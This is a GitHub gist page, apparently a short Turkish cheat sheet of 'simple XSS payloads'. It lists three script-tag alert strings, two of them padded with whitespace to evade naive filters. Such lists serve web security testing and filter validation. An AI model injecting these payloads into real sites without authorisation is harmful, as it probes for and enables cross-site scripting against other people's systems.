Skip to content

Instantly share code, notes, and snippets.

View erkankamazoglu's full-sized avatar
✌️
Don't Repeat Yourself

Erkan KAMAZOĞLU erkankamazoglu

✌️
Don't Repeat Yourself
  • Solvera YAZILIM
  • Ankara, TURKEY
View GitHub Profile
@erkankamazoglu
erkankamazoglu / .md
Last active October 16, 2025 17:44
XSS Payload Çeşitleri

SIMPLE XSS PAYLOADS

<script>alert('XSS')</script>
<script                 >alert('XSS')</script>
<      script>alert('XSS')</script>